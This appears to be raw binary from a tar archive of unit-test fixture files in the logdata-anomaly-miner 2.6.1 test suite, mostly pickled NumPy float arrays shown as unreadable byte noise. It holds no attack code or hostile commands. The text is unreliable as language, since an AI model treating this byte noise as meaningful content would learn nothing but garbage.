xRjF+Å鿗tXd}%S-YFB6@(@'k连^R :,~ZM迢d3nmyvw迤'֘fgrV(_K3EGF+i-ו*Lr翭bn^@<.:Zɰ4 3җzzSi翴3!-Xte H5@7Ea&翸33濺F}j&>ЩGh濿|Y\-5}濡6{[d?l K濄-:GsN)R:Mo)[! Id Mő忍vd4M'>U_vΈ6Hgr|MKU=忓.;,T@\v'N 忘XpSm!F!俛!A[3fb䪫>4j_x7P @W'/俣GH. O㿦Y(f|(- '.㿩lOj?fp㿌H!m㿮QSnB/2cM~5!m43v &`⿴פt69.orH<⿸!]٣gpV⿼]ʆE|`5>S9"$_: !ńAf3wP֖IǦj{ῇWGjIhY AHi7ῊZ'Ῥ#A: ,(q࿏lYO2? 
2HQTQė6 qW~ղMJxm࿕c#\࿷lyiJCu`)࿚&Za=6]v߿z"+߿4߿A@g߿ F߿FYF$߿kc1޿}1 ޿LߺoM޿@D"{޿QY޿W8޿Ue9T޿iݿ7xݿ\[ݿLmݿ`iKݿ *ݿ#"pܿg4>3ܿ&ܿkPhܿXJ_ܿ-k -ܿq}vboۿۿv@ۿz4ۿ8bۿ|Ʈ/ۿ'8D;ۿ|ڿJڿC5!ڿeڿqpsCڿ%"ڿ 4HڿNFQdٿX ٿOyٿ2UWٿ}5ٿY5ٿWؿٮؿdjؿ#6]kؿd¿8ؿN"ؿ]ڄ׿.,f׿p)׿2>j]׿3};׿E  ׿9XdqֿGֿ=wֿ|6qֿ8>ֿD ֿ&w=տHd)տ8տ h#tտOAտK^տSX Կq KԿ!?ԿZ3 #wԿ۔QUԿ^3ԿW:Կ#jw7ӿe|ERӿyӿi_Gӿnk%ӿcӿr}$ҿK ҿ|ҿxKK+[ҿ,l9ҿ}ҿ <ѿ3RsѿDE TѿW8Mѿ wz+ѿE ѿ |пOX`п&Âпaпc9tF?п&п!eϿ<ӽ|pϿY_ ϿG$οIbοPv+οRe.ۮͿډsvͿ]f 9Ϳ"̿h9F̿jF̿q}ʿ˿s@hM|˿ds˿~ױʿL"Znʿ5b*ʿGaɿ &ɿɿ@ȿd%vRȿ'ˊȿ|ǿTǿ1Ҍl"ǿ(ƿ7śOXƿ?aſtſņ}lſʈ(ſR5cĿ)^Ŀ]m)ÿ Aÿ6Pÿ/ ÿcBp=¿sއd¿zQ4O?ib_&4!ſ8GZ>>YVtN੽^j߼d4(hMv@szƘu ѤX 븿A y22V3a|F[M:͈5%T[Z,WaMo}̱2< |t 8&Y0ۮ.=ͭJ=KR:Xh@0m~d򦿪K]mȣ3Ng瞠~~'7-ܙ[@I!qlew1R}s8bYja;X?YRm?K' w??g~?W%?.c@k?kcPc_???o|?S?,+ݚ?o?HWul?({X-?3D£?#/W?_?h ?7?Ѣ?XaDު???o4Ԯ?-ч4?"OeF??6ɱ? 2?ק^?cn)?6y?I ?Ո??R?Tj?p/c? (]+?d]V?.|?sAG?;з?}@-ܼ?rq?gBq?\eZ;?)r?tZ=h?Bx?<+2?|?W(?3hcb?̞?/,?uœ?O?j|[n\?WV?_3#?'?';?Tv?NV?I?|&!?>Xza?3ޙ?3BP?j?( SM?m;?}#?X5 J?48?s?`Ůz?ĭ?($E?t}~_?Xf?i4TOt?7?^ K???S ?}Gn?HY6?aո?9IVO?uk?c1?WQϥ.???,3iL?e?Lv? A?^?,|I??/U?x?5v&F?cX-y?Q˫?l?th?)-? ]C?R@v?aEި?䵹{?-?@?VKTs?ш?vr, ?Jd=? RE[gp??w?-C??۷?? ,:?>zm?xp?4Ң?q7?l8j?)jY+?v?dAf?aR5?@2*g?-d>??2?+od?]Q?KW?ˌ?ƛ?*/?%a?d?R?x@=,?4.^?Qmx? ?mU?>[?J?a|&)??ۉd&?wY?VeD?@?.Sw#?K V? >|?%Pm?G'ܮ?4y?? ?4BZ#?L|??m0?Zl?Q&?Hk???v6-U .?U-FXG?4$_ɦ`?=D??±?k0?k%?J ??TkD?X]?Ŀqw?W?`??հC?j?%?v9~A?mRSZ?wdk t?3R?I;??V?-j ?$$C%?l3ޑ>?( eR/q?~ ~??:j?a ??iV"?ET?ۭ^Bn? ?w.?49?w?d&h8?[?"R?jIq?)7 B?.Đ?8.?|?_9gO?j۷?ۜOU?ҵ ?w}A?32?Kf|e?}?lwN?Jn?\|?I,@I?7^e{??%{?M??V>_?pd@??L{?K*?Qv?nc?_\??~ @\,@>R@W)l@|@%e@\vd@QZ@@P@+FC@<%QY@;

UUU6G(rXG+ީG?9T\G#EG?ޚzG4ĶF0G?/dG?H8G㢖68G?zR~~G(5sG?$G?IjKGܳG?HG?D%gGhuG?1ОG?D1MtG*cuG4lG?LtG?˭qKG?,Q ,Gīˢ:Gmb/G?6UNG?[`gGG?#cGę+0G @G?uG}!DG?UG?b;%\GJ{G?$zOG? ŞTG?snGc()G?Բ\G?oUү GoYGG?]VG?'Ew2G? `.IQTG?^f$GNG| dG?Ģk ҙG?s8\mG?cuX2\G?@G?ӗGɈwGGӽ3t#XG?5R"G?#FG?Q gOPGKG S0G?ĺG?GZ8G? =VG?w_rG?NXĄGҦ&͂Gv]EGoW@,G?U6gdNGݓ|f~GjbzGSLl GՅ/+cG} EΨG?`&]:G?߄HGAu?zG?i# (G?,I*G?lA@G?NG?ɥw}KGftG?Į:GLrPG?g}ҲGDG?ғьG?X(z6Gֺ{GG?ux`JGԁ\G뮢a(G?ڑG}G?(>#)G*ѳTG?}gPG?_DG?3]wG?sFG?ώwT(GcU@Gd20XG?Gt-zGL*m{G?\\6CZG?xxfG?0( GJ@(G?ḿ( mlG`lG&Ç5̺G EGS;0GxQG?)_W6GɈ\PGdt=GRTG?RG,~G?>#x3bG?vG?Ꭲ&GEt[ GĐ(G?\ G_ G?3yG= @G?;:G?zV*6G?̤A4P|G6G?[G!dGK53iGσ;G?FDG?$&CŔGBli?rGrW$G?кjM{G?'C/\G+0.7.Gp[7G ŔAG?\IjG?ÞLG?ТGHDG? rpTGPB`GMGo+XG?ЁG?}PGª2hG?;yPG7cG?M4 ;`G=]fsv(G@֩G 0G?M}͵G?ϧ[G#0+GO'3G?_VG?)dG?件gG?uG?0I(G?g(GsdGڊG?җ[VG? 8DTG6[u atG?rhG|dTGݧقG?(4G?&1 G?H_RG?Y G?$GG?[8>.G~8G @QyG@vG?XIVG?GI4ԤG?3U4G?jInG^'GNMGTG?rtGŀYB8G֤dopG?ledG?ߩtG?FNqG?Џ@!G?\ 9 Gpk.G~mfMG?1&%GnvG?0G?tКGl?as@G0fG?#OxGB X`G?sųG?KzXG?U[G]ƁG֒&<GsG[9oGʈG/\GgRhG viG?Ff@G?VG?hMˆ5G֔gTG?]^PG٦zGԂE8GncGG" G[GuW6.G?&t{RG??NNG?UpG?-PG?a gwGֻJ\G&gG?TrG6)JGcIG? G?eGwF`G?!wގG?=G?D1V:G#1: GijRLG?ՙhwG?vG2K%sG?"xG;9;G?V0GԺ|G֠$ G?15hG?M/S_GЛ(UG?#G8,TUG,0G?S`G#[$G?:dG?߉HKGVGWCwGѵq0G? ]hG!DLPG?͊ G?Ҕq$G?9DG?:Rh6Gzl%G?kFTG?ﳞG?YӀA8G?ED G?_uIDG?Щ>GylG? 1 G?3lG?8 @UG?u8G?(G?HMG? |xG? ]&kG6@G?KꂭG ɔ G?꽱))aGž;G.EG|uuNG?sQ;tG?h=kHGȿG?>5XG? vʀDGUnG?ڌE*GT7PG˲ϞGٹa`xG dRG;@odG'3G veTG?m*NGnG?UXG?ொG?߶{\G!KdG?&~G%G?(|$rG?eOn(TG?IuG?^GؕEuGռQ G?MJG?`\lXG?zHGĎKG?&)ǮGJk G?qlHGض.#DGc@tGsVKhG5tG}vG?i G?0G?[*G?{%XcG?.G?2 !G_lG?wb VGueG?tʔGፗ:G?&G?г̒1\G :ʁGQ `G?֯UU$Gҗ()Gޜ*G?zG?re>@G_RG?@GxkG?mj1nG*G`ў$G^G?vKGQw?Gy)G?V@G ?jG? U.HG&GH4ěVG?- G|Gxe G?f2G,vG6GSaiG? |G?+(GAnpG?cǝGHGdԸG?T]GdG.I1GXGS/PG?XG.DGZWĠG:lG.G?d;nGMB_rG?{-YGX|g.YG?y˜G~b GW!dXG?qq%G?eeJvG7? :G G@G?ҡ GfG?(7sGN G?jӍ{*G?4G!G?]G?kG7$HG?;G?VGײa+G?2ge(G?^$G?lIJGJXG5wG?R\ GG;TN@G,0G) ,G?ߌc<:TGA!G?.#GoAǂ 8G?)kG?ͬ[yG?vָ(G?uG? ӇEG?3GT3 G?Hn}G1GG,OGyZlG?_M?G?X6A6VG?(\cKG @GG? 
G?0®GG?ܒ#:0GN@G?~S~G?S&A8G?ҫgGM]G?ff <_LG?"+vHG1c@G?-4G8`G?!"aGvϤdG? 3 G??DG? GyȾ#GY @GɒGRȨ8G?@[EG?|9G?ςqa`G?`G?狅PG?#GgG?F"`G?O٠%G>VGc- G?V`G?@ G?@*.&Gv/`Gk3G%Gb +{5GkjsbG?ыG?)xTG{kG?G5nGyMG%-G?젽PG?j+G?㏄ dD0G\5Gfu >G姖閠G?MH=G҆CP˔G?3%ݘG?u.NtG?iXG? l, tG?/5HG3w G"<G$w}GOIGvBD@G??"*G؀,GУ=+ xG?m:IG?~0G8@G?OhGcpG2G?a^UG޺GQ8vGOCG?l@=TG?{G?=H*G?J)6LG՘3hGi@G?d8o`Gd"Խ`G?hG?1O4G|3YG?QG?ʽlxG?΢KHGJ4ѠGȈ*GpG?VA#G.DG G?ke`,G?LG?sE~G% G?H/G?lG?( >:G?/%tG&G?sG?m|E G?伳/G?〲XG?ԕw\G?ݏl$xlG%JG* CjG? :J@GNG?g&5GZ-@G]G،zƄG?YK>G?♓G?OXkGJGX%G?ZyG?c;_KAG? tGHs2G =G0$ G׸~\!G? R]G-XrRG޷9A@G?ŸKLGrG'cG?a4/lG?hOxHG?_<8G?ٔ~'GLXG?FF G? Nc"Gɢ>|@GF nG?Н0Tz%GpfdG?s" G?) z^G?)bG?K8G?OFG?Y[%a4GXlG[rn G=|G? ` G?ã9nGj! G%BȐGN7G?9+0G?[(G? `GxG?ꍘd*G?v pG?–8G?yF`fG?LdG?wG?ԠyDG?\-ͰG;G?ŠzĠGLG?Am&0G?&jG{GN#v0G?E>`RG?i(G? G7Gj[G?ZLGn~eBGXFG5n7gG?^wtG?kYG?f`,G?s-GG?^G?[m ;GIrC?G?"G*BbG58bˈG|ڴXGL> `GH_Gp*ҜG꿞lG?ЯG?|G?l rG?1G̞0G?IGT FG%t" iG?4XG?8B/5FG:/؊|G?⁆gG?WlrG? G?e:G֥4Gq,G?AzG?ƬiWXG)+GU.GdG3G?̔^Y,G?ʂy1G?܇~G?o'Gj:X8G?JG4Gou@G? ^G?ԽGڛ ڄ!$GYd}G?I{|G?h(4G? 2G0BG?ف/\@G5G= GG?EG?[dG?Q<#Gg @NG--G?ߨ,G9)b`G?OYG稀2GӘuG? ֩EG?7G?×^<*G?CLsvG>SG׳ Gxn8%G?|GVuGتiG?#"pGk6bG#割`G+ʼG?z2(G7JVOGN;a*G / G?Ha-G?GV!BeG?'~@G?DGUxdkG?(=pNG?3"+GlG?܆,"G?NG?V:G?M64|GM6.G?v ^GJGctGs4G則%G+(S|eTG?[9G?u`G+G?b+VPG?GEGk;0G?T"G?3A5%0G?1\G?NaRG?u1OG?覮ƯGJ\8PGl pG?ª G?-qG?UBNG?V>\G?ݷɦG EȭG&GeeQ G3``GI!lG?&-\G?&G32G@PGb5G(f"G?s".G?ߍ-~PG?k^}rG?pe`G?5RhOG)RGG'暡G^GGŠG?ǠGg!`>G?%WFG?=G?ӻ juG?{hźG?B5GAGΙcpG?èG?5MGvzGAGߥ0G6kGR6G?սŅDG?5S Gْ[WG?lًG=24LGO_|`G?)YxG{sG?6˾G?຋7G?K*GSi/ `G?9NGŸXGGGrhG?vGG?m-G?QhG,DG yWdG?rGئGRyGTB>G?yG?VG?K4nG?r.YEKG?G<G?⌉uG3s xG?xgȐG?r0G?G?ADR:GhJFG?aHvG?!)wG?ĶMTf8Gop$`G? 6v~G?Ҧ'G#xN(GࠝY G?+`|G?) BGxw[G?SeCG?=UvGr(eG;4xG? BNPG 5ŨGd7 PGwKXG?ȀVEGA$5АG?|VoJGǩjGTJN\G?G&zGX|ŸG?SMDG?7V{ DGZtG?nA5 GN G?c*%G?#݀G?GDgÖG?ɢa`G?_1G?KG5T5G?y@GxCJ5^G?W~HG?>Gƕ9lMhG8GߩN5)G@G v"G?jkϧxGb=Gɖ:7 GtPG?ꤛG?-TG[LGDG~cSnG?AxWlGຩG?ۙ;'G遵mVG?wkNPG?0c'@G?G礶ʀGŗl3G5^2G/&GLMG?[4G ;`Gp$ru#G?#G8G? 
Q GyYz7G$⻬G?F=,8GdG?*G?AG?xuG?ٌkxG}G猔z[G?S,vGԂG?}TzG?&rBG?*()xG?;G?,;G˭T@G?DG?Cxu@G|"#(Gy0Gj-"G?wO}GnG֫5Z@GΉXUPG?Y#GGWyG綒#G?(ЅUjG?B%A{eLGaNPM4G? dP*G?QAf2G?7=ZeG??_Gź}UpG܍>GsG?Sk:G?5DvØG?w͛,G?P[GtG#^G?[cGP &)GTtG?+GǢG?rgXGu3G?삗5PG?:$FpGMƆĵvG?~)LGޠG?A(~G?mP0G|`G(`GUX9G?PTp$G!{G?pG?_աG?⣘坈G?hG?Qf`*G?౟2G?WyGRu,G?tG?8wG➰4Gեh]\G?ɶ|Z{@GG?-5WG?5:WGX@Gݜ)GV(b٤G?i^%|@G?Ъ$iG?b*vOqDGLG?%sG?a=G~^/GJ|FlG?֎65G? ckzG?剛RG?qRQGR GLGVouNzGfGTG?!eLG?GAGFG?? )G?phG?RG#0Gw|VGQVG?ד"AG? pGفTe](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/uni_data_test4000066400000000000000000000232541437606560100273230ustar00rootroot00000000000000&](JjYJsJ( JJJ8JJJw J{J׃J6JJJcJ+ Jt JJ? JEJVJǹJ@JJ\ JJ:MJpJxJ J JJ"JJܮJ:Jw]J;J-[JPJG+J J4JJ J6J%|J J JKJ`|JwJˎJ%iJJJ@ JeJXJ JJ~ JhJJkJNJ JJJ$~JHJ3XJg| JJu7J JXJ2J JJJJJ'J JVJuM,JE7JbJ9J%J\JQ{JJJN~ JLJJJJYJպJ!JgJs#J1JJ1uJk_JIJJ~JmJgmJJTJ7JJ$J]M&Ja JzJJ J5aJJFJJoJJXJ J3 JJEJE)JJ& J J)JJJJqJKJJJJƟJJJLJ9JSJJ- JcJJJ J(#J J4JrJMjJS| JbJq J/J[0JJ JJgJJJ4JJJJ( J_JmQ JJJ\JJgJJJ"JϧJ\JAJqMGJ M JJaJQJ=JkSJJ|JJ&J MiJJv J1>JJeJХ JJRJMd)J]RJp Jq(J{jJS\J(aJm&J JJJ7JtJJJeJ#Jr JJJW J JwzJuRJIJPSJJ:JJB JJJJJ JJSJ( J-5JJcJJ}J҄JJ-JJJMJ+J\JJbJJ3AJJJJJzqJJ_JuJ26JJJ6 J$J# J JPJg JR&JdJJ]JJ'J bJFJjVJ>JpJ JCJAJJJPO JJy J:IJ\ JUp Jb JJw JfJJJ JJJJ/J JiJeJwJLJ JkJJ J JJ J+J JJJ JSJ Jb?JsJ3iJJyv J_J=JfJ{ J=J JbJ"JJوJM]J~JdJxJ HJJ9J%: JH JJJ/tJCJJJB JVJzJJcJ JJ.-JJu JdJ?JwJJ* JS JgJ9JJkJKJ JJ|<J^ J'J?JTWJ5JJ"J7JƋJJsJ' JJJ,JyJږJ9JP JJtJ)J_sJi JMbJTJNJ8JX JBOJ J JpJ oJJJ/J5JMmJJĹJ"J7JG Jp JFJɏJ JJA&JxJ JJJJۤJ8J J'kJ1JMJJJ=5JJ=eJh|JJuMKJ22M_JJ:wJZJ J̙Jq J"CJJ)- Jn Jn JJ,J" JجJKJ J:JJ)JIJiYJ[J6 JJ#T JJ J J<JJJGJJq J;VJmJ7 J`JfJ^J J*JJ J JSJJJ J JKJJlJJ: J JbJJJ; Jy JJ Jlw J4JwJZvJJ;J1J? JRJSJHJ J pJ JuJ\ JNJ`J2JJJJ}J\MFOM]J2JJlJEJ? 
JNJnJsJJJJv;JJXJQ Jd J J*6J]JJJ{JeJáJ> JCJعJbJ;JLJFJ Jn&JJEJPIJJͶJJ@ J>J2| JsJFJFJ!)J JJJ' JJ1J4JtJJMrJJZJ\MJ1gJiJ\JJ7JTJJy JδJlJ^ JRJJ(JhJ41JIJuJwb J)*J J5J J= JJgJ_JJJ}J > JJJNJ*JJJG JNJh J]]JJZJpJJWJJAJ J Jf JJocJI~JKJ=JοJB4J J JN JT:JwJU7J$JUUU6G(rXG+ީG?9T\G#EG?ޚzG4ĶF0G?/dG?H8G㢖68G?zR~~G(5sG?$G?IjKGܳG?HG?D%gGhuG?1ОG?D1MtG*cuG4lG?LtG?˭qKG?,Q ,Gīˢ:Gmb/G?6UNG?[`gGG?#cGę+0G @G?uG}!DG?UG?b;%\GJ{G?$zOG? ŞTG?snGc()G?Բ\G?oUү GoYGG?]VG?'Ew2G? `.IQTG?^f$GNG| dG?Ģk ҙG?s8\mG?cuX2\G?@G?ӗGɈwGGӽ3t#XG?5R"G?#FG?Q gOPGKG S0G?ĺG?GZ8G? =VG?w_rG?NXĄGҦ&͂Gv]EGoW@,G?U6gdNGݓ|f~GjbzGSLl GՅ/+cG} EΨG?`&]:G?߄HGAu?zG?i# (G?,I*G?lA@G?NG?ɥw}KGftG?Į:GLrPG?g}ҲGDG?ғьG?X(z6Gֺ{GG?ux`JGԁ\G뮢a(G?ڑG}G?(>#)G*ѳTG?}gPG?_DG?3]wG?sFG?ώwT(GcU@Gd20XG?Gt-zGL*m{G?\\6CZG?xxfG?0( GJ@(G?ḿ( mlG`lG&Ç5̺G EGS;0GxQG?)_W6GɈ\PGdt=GRTG?RG,~G?>#x3bG?vG?Ꭲ&GEt[ GĐ(G?\ G_ G?3yG= @G?;:G?zV*6G?̤A4P|G6G?[G!dGK53iGσ;G?FDG?$&CŔGBli?rGrW$G?кjM{G?'C/\G+0.7.Gp[7G ŔAG?\IjG?ÞLG?ТGHDG? rpTGPB`GMGo+XG?ЁG?}PGª2hG?;yPG7cG?M4 ;`G=]fsv(G@֩G 0G?M}͵G?ϧ[G#0+GO'3G?_VG?)dG?件gG?uG?0I(G?g(GsdGڊG?җ[VG? 8DTG6[u atG?rhG|dTGݧقG?(4G?&1 G?H_RG?Y G?$GG?[8>.G~8G @QyG@vG?XIVG?GI4ԤG?3U4G?jInG^'GNMGTG?rtGŀYB8G֤dopG?ledG?ߩtG?FNqG?Џ@!G?\ 9 Gpk.G~mfMG?1&%GnvG?0G?tКGl?as@G0fG?#OxGB X`G?sųG?KzXG?U[G]ƁG֒&<GsG[9oGʈG/\GgRhG viG?Ff@G?VG?hMˆ5G֔gTG?]^PG٦zGԂE8GncGG" G[GuW6.G?&t{RG??NNG?UpG?-PG?a gwGֻJ\G&gG?TrG6)JGcIG? G?eGwF`G?!wގG?=G?D1V:G#1: GijRLG?ՙhwG?vG2K%sG?"xG;9;G?V0GԺ|G֠$ G?15hG?M/S_GЛ(UG?#G8,TUG,0G?S`G#[$G?:dG?߉HKGVGWCwGѵq0G? ]hG!DLPG?͊ G?Ҕq$G?9DG?:Rh6Gzl%G?kFTG?ﳞG?YӀA8G?ED G?_uIDG?Щ>GylG? 1 G?3lG?8 @UG?u8G?(G?HMG? |xG? ]&kG6@G?KꂭG ɔ G?꽱))aGž;G.EG|uuNG?sQ;tG?h=kHGȿG?>5XG? vʀDGUnG?ڌE*GT7PG˲ϞGٹa`xG dRG;@odG'3G veTG?m*NGnG?UXG?ொG?߶{\G!KdG?&~G%G?(|$rG?eOn(TG?IuG?^GؕEuGռQ G?MJG?`\lXG?zHGĎKG?&)ǮGJk G?qlHGض.#DGc@tGsVKhG5tG}vG?i G?0G?[*G?{%XcG?.G?2 !G_lG?wb VGueG?tʔGፗ:G?&G?г̒1\G :ʁGQ `G?֯UU$Gҗ()Gޜ*G?zG?re>@G_RG?@GxkG?mj1nG*G`ў$G^G?vKGQw?Gy)G?V@G ?jG? U.HG&GH4ěVG?- G|Gxe G?f2G,vG6GSaiG? 
|G?+(GAnpG?cǝGHGdԸG?T]GdG.I1GXGS/PG?XG.DGZWĠG:lG.G?d;nGMB_rG?{-YGX|g.YG?y˜G~b GW!dXG?qq%G?eeJvG7? :G G@G?ҡ GfG?(7sGN G?jӍ{*G?4G!G?]G?kG7$HG?;G?VGײa+G?2ge(G?^$G?lIJGJXG5wG?R\ GG;TN@G,0G) ,G?ߌc<:TGA!G?.#GoAǂ 8G?)kG?ͬ[yG?vָ(G?uG? ӇEG?3GT3 G?Hn}G1GG,OGyZlG?_M?G?X6A6VG?(\cKG @GG? G?0®GG?ܒ#:0GN@G?~S~G?S&A8G?ҫgGM]G?ff <_LG?"+vHG1c@G?-4G8`G?!"aGvϤdG? 3 G??DG? GyȾ#GY @GɒGRȨ8G?@[EG?|9G?ςqa`G?`G?狅PG?#GgG?F"`G?O٠%G>VGc- G?V`G?@ G?@*.&Gv/`Gk3G%Gb +{5GkjsbG?ыG?)xTG{kG?G5nGyMG%-G?젽PG?j+G?㏄ dD0G\5Gfu >G姖閠G?MH=G҆CP˔G?3%ݘG?u.NtG?iXG? l, tG?/5HG3w G"<G$w}GOIGvBD@G??"*G؀,GУ=+ xG?m:IG?~0G8@G?OhGcpG2G?a^UG޺GQ8vGOCG?l@=TG?{G?=H*G?J)6LG՘3hGi@G?d8o`Gd"Խ`G?hG?1O4G|3YG?QG?ʽlxG?΢KHGJ4ѠGȈ*GpG?VA#G.DG G?ke`,G?LG?sE~G% G?H/G?lG?( >:G?/%tG&G?sG?m|E G?伳/G?〲XG?ԕw\G?ݏl$xlG%JG* CjG? :J@GNG?g&5GZ-@G]G،zƄG?YK>G?♓G?OXkGJGX%G?ZyG?c;_KAG? tGHs2G =G0$ G׸~\!G? R]G-XrRG޷9A@G?ŸKLGrG'cG?a4/lG?hOxHG?_<8G?ٔ~'GLXG?FF G? Nc"Gɢ>|@GF nG?Н0Tz%GpfdG?s" G?) z^G?)bG?K8G?OFG?Y[%a4GXlG[rn G=|G? ` G?ã9nGj! G%BȐGN7G?9+0G?[(G? `GxG?ꍘd*G?v pG?–8G?yF`fG?LdG?wG?ԠyDG?\-ͰG;G?ŠzĠGLG?Am&0G?&jG{GN#v0G?E>`RG?i(G? G7Gj[G?ZLGn~eBGXFG5n7gG?^wtG?kYG?f`,G?s-GG?^G?[m ;GIrC?G?"G*BbG58bˈG|ڴXGL> `GH_Gp*ҜG꿞lG?ЯG?|G?l rG?1G̞0G?IGT FG%t" iG?4XG?8B/5FG:/؊|G?⁆gG?WlrG? G?e:G֥4Gq,G?AzG?ƬiWXG)+GU.GdG3G?̔^Y,G?ʂy1G?܇~G?o'Gj:X8G?JG4Gou@G? ^G?ԽGڛ ڄ!$GYd}G?I{|G?h(4G? 2G0BG?ف/\@G5G= GG?EG?[dG?Q<#Gg @NG--G?ߨ,G9)b`G?OYG稀2GӘuG? ֩EG?7G?×^<*G?CLsvG>SG׳ Gxn8%G?|GVuGتiG?#"pGk6bG#割`G+ʼG?z2(G7JVOGN;a*G / G?Ha-G?GV!BeG?'~@G?DGUxdkG?(=pNG?3"+GlG?܆,"G?NG?V:G?M64|GM6.G?v ^GJGctGs4G則%G+(S|eTG?[9G?u`G+G?b+VPG?GEGk;0G?T"G?3A5%0G?1\G?NaRG?u1OG?覮ƯGJ\8PGl pG?ª G?-qG?UBNG?V>\G?ݷɦG EȭG&GeeQ G3``GI!lG?&-\G?&G32G@PGb5G(f"G?s".G?ߍ-~PG?k^}rG?pe`G?5RhOG)RGG'暡G^GGŠG?ǠGg!`>G?%WFG?=G?ӻ juG?{hźG?B5GAGΙcpG?èG?5MGvzGAGߥ0G6kGR6G?սŅDG?5S Gْ[WG?lًG=24LGO_|`G?)YxG{sG?6˾G?຋7G?K*GSi/ `G?9NGŸXGGGrhG?vGG?m-G?QhG,DG yWdG?rGئGRyGTB>G?yG?VG?K4nG?r.YEKG?G<G?⌉uG3s xG?xgȐG?r0G?G?ADR:GhJFG?aHvG?!)wG?ĶMTf8Gop$`G? 6v~G?Ҧ'G#xN(GࠝY G?+`|G?) BGxw[G?SeCG?=UvGr(eG;4xG? 
BNPG 5ŨGd7 PGwKXG?ȀVEGA$5АG?|VoJGǩjGTJN\G?G&zGX|ŸG?SMDG?7V{ DGZtG?nA5 GN G?c*%G?#݀G?GDgÖG?ɢa`G?_1G?KG5T5G?y@GxCJ5^G?W~HG?>Gƕ9lMhG8GߩN5)G@G v"G?jkϧxGb=Gɖ:7 GtPG?ꤛG?-TG[LGDG~cSnG?AxWlGຩG?ۙ;'G遵mVG?wkNPG?0c'@G?G礶ʀGŗl3G5^2G/&GLMG?[4G ;`Gp$ru#G?#G8G? Q GyYz7G$⻬G?F=,8GdG?*G?AG?xuG?ٌkxG}G猔z[G?S,vGԂG?}TzG?&rBG?*()xG?;G?,;G˭T@G?DG?Cxu@G|"#(Gy0Gj-"G?wO}GnG֫5Z@GΉXUPG?Y#GGWyG綒#G?(ЅUjG?B%A{eLGaNPM4G? dP*G?QAf2G?7=ZeG??_Gź}UpG܍>GsG?Sk:G?5DvØG?w͛,G?P[GtG#^G?[cGP &)GTtG?+GǢG?rgXGu3G?삗5PG?:$FpGMƆĵvG?~)LGޠG?A(~G?mP0G|`G(`GUX9G?PTp$G!{G?pG?_աG?⣘坈G?hG?Qf`*G?౟2G?WyGRu,G?tG?8wG➰4Gեh]\G?ɶ|Z{@GG?-5WG?5:WGX@Gݜ)GV(b٤G?i^%|@G?Ъ$iG?b*vOqDGLG?%sG?a=G~^/GJ|FlG?֎65G? ckzG?剛RG?qRQGR GLGVouNzGfGTG?!eLG?GAGFG?? )G?phG?RG#0Gw|VGQVG?ד"AG? pGفTe.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/uni_data_test7000066400000000000000000001575111437606560100273320ustar00rootroot00000000000000>](](numpy.core.multiarrayscalarnumpydtypef8KKR(KRhh C| ᅯRhh CU.h?Rhh Cz)!?Rhh Ct??}?Rhh C(~@On߿Rhh C0vRhh C ?Rhh C=?Rhh CPwFϿRhh CXlr$ϿRhh C`"`ImRhh CO㿔Rhh Cuu翔Rhh CP޿Rhh C`~5%?Rhh CPȿRhh CܕRhh ClKK⿔Rhh CVkhp8?Rhh CI>?Rhh CJ?Rhh Ch翔Rhh COT:?Rhh CT7=9ٿRhh C@F?Rhh C(?Rhh C?Rhh Cr16m?Rhh CO޿Rhh C,{'?Rhh CzDBW?Rhh CߙK鿔Rhh CIS忔Rhh C6'ES=翔Rhh Ca=?Rhh C6 WᅯRhh C6Q艻?Rhh C$a"R[濔Rhh ChWW?Rhh CbORhh CM-̿Rhh C\l'y?Rhh C +tuRhh C|t/տRhh C$B/t?Rhh C0[v>ϿRhh Ca-޿Rhh C}{W?Rhh C\%eGԿRhh Cr:<6܈?Rhh C鿔Rhh C?Rhh C DlۿRhh Cs/l?Rhh C@ ǿƿRhh CvǚIc?Rhh Ch 濔Rhh Czz῔Rhh CKLhoԿRhh C2 mRhh Ch P _ԿRhh Cj3R1?Rhh CbJ+GӿRhh C8SܿRhh C>9V῔Rhh C,7"ݿRhh CnGݿRhh C*返Rhh C.-FbhRhh CRN㿔Rhh CNꮯ3?Rhh CN뿔Rhh CDs&)l?Rhh CpnKѿRhh CN~J;濔Rhh C`:Xi颿Rhh C@ܿRhh C_w\?Rhh Cو.?Rhh C3 ?Rhh C^Us1뿔Rhh C O){jRhh C$+7 `?Rhh CL?Rhh C'㿔Rhh Cn?Rhh Cn?Rhh C0*_꿔Rhh C¢ ?Rhh C꿔Rhh C|7]ӿRhh CX1CܿRhh Cۉ?Rhh C:.?Rhh C軨U?Rhh CIO?Rhh C8ÿRhh C>k?Rhh C^W5e返Rhh C`J?-?Rhh C֖K῔Rhh C(w5b?Rhh ChS?Rhh C`"gտRhh C<_濔Rhh C k @a返Rhh C4῔Rhh CZ:ҿRhh CN9Y?Rhh C\D?Rhh C&Rhh CgѷY?Rhh C %?Rhh CP8?Rhh CzŤ<ᅯRhh Cz ?Rhh C!P_?Rhh CVQ?Rhh Cf?Rhh CʎǭJ?Rhh CB]Rhh C0DѿRhh Chx+?Rhh CL?Rhh C?Rhh C 
C_SǿRhh Ch Z ?Rhh C ?Rhh Cr;Rhh C8ܿRhh C,t.?Rhh Cl'ۿRhh Cz?Rhh C([>Rhh CyG9?Rhh C??Rhh C`Rhh CXH?Rhh C 0k?Rhh C < {?Rhh Cq]~QRhh CӪ7?Rhh Cc~῔Rhh C"R?Rhh Cu87~鿔Rhh Cy%Rhh C̗g/Rhh CxݿRhh C?ӿRhh CYbj῔Rhh Cܴ?Rhh Cn7?Rhh CHwh?Rhh C)OܿRhh CvM,?Rhh C~ 5㿔Rhh CD ~ܿRhh C sBn?Rhh Cik⿔Rhh C( 4GܿRhh CY3ᅯRhh C( gVؿRhh C0q~o?Rhh CW}?Rhh C0zۦRhh C$H쿔Rhh CItֿRhh C$rؑ?Rhh C W亘ǿRhh C|?Rhh Ci ?Rhh C'K?Rhh C7E?Rhh CL^M$?Rhh C߅0?Rhh C῔Rhh C76p?Rhh CcMRhh Cˆ?Rhh Cx]??Rhh CжWಿRhh C|2s ?Rhh C,k.翔Rhh C0`dcпRhh CD[?Rhh CxځaĿRhh CY 俔Rhh CLZL4oRhh Cr*K?Rhh Chw?Rhh C 7鶼Rhh Cx~_6?Rhh CSxRhh C>R@?Rhh C5PcRhh Co|Iy??Rhh C`Q+u*ſRhh C&ʿRhh C>4J࿔Rhh C(c]?Rhh C&5¿Rhh C ſRhh C}¿Rhh 